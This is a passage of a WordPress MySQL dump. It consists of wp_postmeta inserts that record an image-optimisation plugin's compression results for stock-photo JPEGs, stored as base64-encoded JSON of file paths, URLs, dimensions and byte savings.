IwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc5NjMsImlkIjoyNzQyfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Nzk2NiwiaWQiOjI3NDJ9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3OTY4LCJpZCI6Mjc0Mn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMzUzNDQxNDUwLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzM1MzQ0MTQ1MC01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18zNTM0NDE0NTAtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc5NzEsImlkIjoyNzQyfV0='); 
INSERT INTO `wp_postmeta` VALUES (28778, 2717, 'wpfc_optimisation_reduction', '1278323'); 
INSERT INTO `wp_postmeta` VALUES (28779, 2717, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMuanBnIiwid2lkdGgiOjQwMDAsImhlaWdodCI6MjY2OSwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMuanBnIiwicmVkdWN0aW9uIjoxMjc4MzE1LCJ0aW1lIjoxNDgzNTQ3OTg5LCJpZCI6IjI3MTcifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0Nzk5MSwiaWQiOjI3MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My04MDB4NTM0LmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTM0LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtODAweDUzNC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTgwMHg1MzQuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ3OTk0LCJpZCI6MjcxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDc5OTcsImlkIjoyNzE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtMTYwMHgxMDY4LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjgsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My0xNjAweDEwNjguanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My0xNjAweDEwNjguanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MDAxLCJpZCI6MjcxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgwMDQsImlkIjoyNzE3fSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtMjAweDIwMC5qcGciLCJ3aWR0aCI6MjAwLCJoZWlnaHQiOjIwMCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTIwMHgyMDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My0yMDB4MjAwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODAwNiwiaWQiOjI3MTd9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My0yMjV4MjI1LmpwZyIsIndpZHRoIjoyMjUsImhlaWdodCI6MjI1LCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtMjI1eDIyNS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTIyNXgyMjUuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MDA5LCJpZCI6MjcxN30seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzEwXC9zaHV0dGVyc3RvY2tfMjkzNjI0NDUzLTUxMHg2MDAuanBnIiwid2lkdGgiOjUxMCwiaGVpZ2h0Ijo2MDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8xMFwvc2h1dHRlcnN0b2NrXzI5MzYyNDQ1My01MTB4NjAwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMTBcL3NodXR0ZXJzdG9ja18yOTM2MjQ0NTMtNTEweDYwMC5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgwMTIsImlkIjoyNzE3fV0='); 
INSERT INTO `wp_postmeta` VALUES (28780, 2651, 'wpfc_optimisation_reduction', '1714445'); 
INSERT INTO `wp_postmeta` VALUES (28781, 2651, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNDUwMTY0NS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTQ1MDE2NDUuanBnIiwid2lkdGgiOjMwMDAsImhlaWdodCI6MjAwMCwibWltZV90eXBlIjoiIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTQ1MDE2NDUuanBnIiwicmVkdWN0aW9uIjoxNzE0NDQxLCJ0aW1lIjoxNDgzNTQ4MDI0LCJpZCI6IjI2NTEifSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTQ1MDE2NDUtMzQweDM0MC5qcGciLCJ3aWR0aCI6MzQwLCJoZWlnaHQiOjM0MCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzE0NTAxNjQ1LTM0MHgzNDAuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNDUwMTY0NS0zNDB4MzQwLmpwZyIsInJlZHVjdGlvbiI6MSwidGltZSI6MTQ4MzU0ODAyNywiaWQiOjI2NTF9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNDUwMTY0NS04MDB4NTMzLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NTMzLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTQ1MDE2NDUtODAweDUzMy5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzE0NTAxNjQ1LTgwMHg1MzMuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MDMwLCJpZCI6MjY1MX0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMzE0NTAxNjQ1LTc2OHg1MTIuanBnIiwid2lkdGgiOjc2OCwiaGVpZ2h0Ijo1MTIsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNDUwMTY0NS03Njh4NTEyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTQ1MDE2NDUtNzY4eDUxMi5qcGciLCJyZWR1Y3Rpb24iOjEsInRpbWUiOjE0ODM1NDgwMzMsImlkIjoyNjUxfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18zMTQ1MDE2NDUtMTYwMHgxMDY3LmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjEwNjcsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNDUwMTY0NS0xNjAweDEwNjcuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzMxNDUwMTY0NS0xNjAweDEwNjcuanBnIiwicmVkdWN0aW9uIjoxLCJ0aW1lIjoxNDgzNTQ4MDM2LCJpZCI6MjY1MX1d'); 
INSERT INTO `wp_postmeta` VALUES (28782, 2650, 'wpfc_optimisation_reduction', '5702'); 
INSERT INTO `wp_postmeta` VALUES (28783, 2650, 'wpfc_optimisation', 'W3siZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS5qcGciLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEuanBnIiwid2lkdGgiOjM5ODksImhlaWdodCI6MjIwMCwibWltZV90eXBlIjoiIiwiZXJyb3JfY29kZSI6OSwidGltZSI6MTQ4MzU0ODA0NCwiaWQiOiIyNjUwIn0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTM0MHgzNDAuanBnIiwid2lkdGgiOjM0MCwiaGVpZ2h0IjozNDAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS0zNDB4MzQwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtMzQweDM0MC5qcGciLCJyZWR1Y3Rpb24iOjQ2MiwidGltZSI6MTQ4MzU0ODA0OCwiaWQiOjI2NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS04MDB4NDQxLmpwZyIsIndpZHRoIjo4MDAsImhlaWdodCI6NDQxLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtODAweDQ0MS5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTgwMHg0NDEuanBnIiwicmVkdWN0aW9uIjo3NDIsInRpbWUiOjE0ODM1NDgwNTIsImlkIjoyNjUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtNzY4eDQyNC5qcGciLCJ3aWR0aCI6NzY4LCJoZWlnaHQiOjQyNCwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTc2OHg0MjQuanBnIiwibWltZV90eXBlIjoiaW1hZ2VcL2pwZWciLCJkZXN0aW5hdGlvbl9wYXRoIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcL3dwZmMtYmFja3VwXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS03Njh4NDI0LmpwZyIsInJlZHVjdGlvbiI6NjYyLCJ0aW1lIjoxNDgzNTQ4MDU3LCJpZCI6MjY1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTE2MDB4ODgyLmpwZyIsIndpZHRoIjoxNjAwLCJoZWlnaHQiOjg4MiwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTE2MDB4ODgyLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtMTYwMHg4ODIuanBnIiwicmVkdWN0aW9uIjoxNzI4LCJ0aW1lIjoxNDgzNTQ4MDYyLCJpZCI6MjY1MH0seyJmaWxlIjoiXC9ob21lXC9ub3RhY3RpdmVkZGRcL3B1YmxpY19odG1sXC9tczRcL3dwLWNvbnRlbnRcL3VwbG9hZHNcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTI1MHgyNTAuanBnIiwid2lkdGgiOjI1MCwiaGVpZ2h0IjoyNTAsInVybCI6Imh0dHBzOlwvXC93d3cubWlsbGVyLXN0ZXBoZW5zb24uY29tXC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS0yNTB4MjUwLmpwZyIsIm1pbWVfdHlwZSI6ImltYWdlXC9qcGVnIiwiZGVzdGluYXRpb25fcGF0aCI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC93cGZjLWJhY2t1cFwvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtMjUweDI1MC5qcGciLCJyZWR1Y3Rpb24iOjQ1NSwidGltZSI6MTQ4MzU0ODA2NSwiaWQiOjI2NTB9LHsiZmlsZSI6IlwvaG9tZVwvbm90YWN0aXZlZGRkXC9wdWJsaWNfaHRtbFwvbXM0XC93cC1jb250ZW50XC91cGxvYWRzXC8yMDE2XC8wOFwvc2h1dHRlcnN0b2NrXzI3ODg0NDgyMS0yMDB4MjAwLmpwZyIsIndpZHRoIjoyMDAsImhlaWdodCI6MjAwLCJ1cmwiOiJodHRwczpcL1wvd3d3Lm1pbGxlci1zdGVwaGVuc29uLmNvbVwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtMjAweDIwMC5qcGciLCJtaW1lX3R5cGUiOiJpbWFnZVwvanBlZyIsImRlc3RpbmF0aW9uX3BhdGgiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvd3BmYy1iYWNrdXBcLzIwMTZcLzA4XC9zaHV0dGVyc3RvY2tfMjc4ODQ0ODIxLTIwMHgyMDAuanBnIiwicmVkdWN0aW9uIjo0MDIsInRpbWUiOjE0ODM1NDgwNjgsImlkIjoyNjUwfSx7ImZpbGUiOiJcL2hvbWVcL25vdGFjdGl2ZWRkZFwvcHVibGljX2h0bWxcL21zNFwvd3AtY29udGVudFwvdXBsb2Fkc1wvMjAxNlwvMDhcL3NodXR0ZXJzdG9ja18yNzg4NDQ4MjEtMjI1eDIyNS5qcGciLCJ3aWR0aCI6MjI1LCJoZWlnaHQiOjIyNSwidXJsIjoiaHR0cHM6XC9cL3d3dy5taWxsZXItc3RlcGhlbnNvbi5jb21cL3dwLWNvbn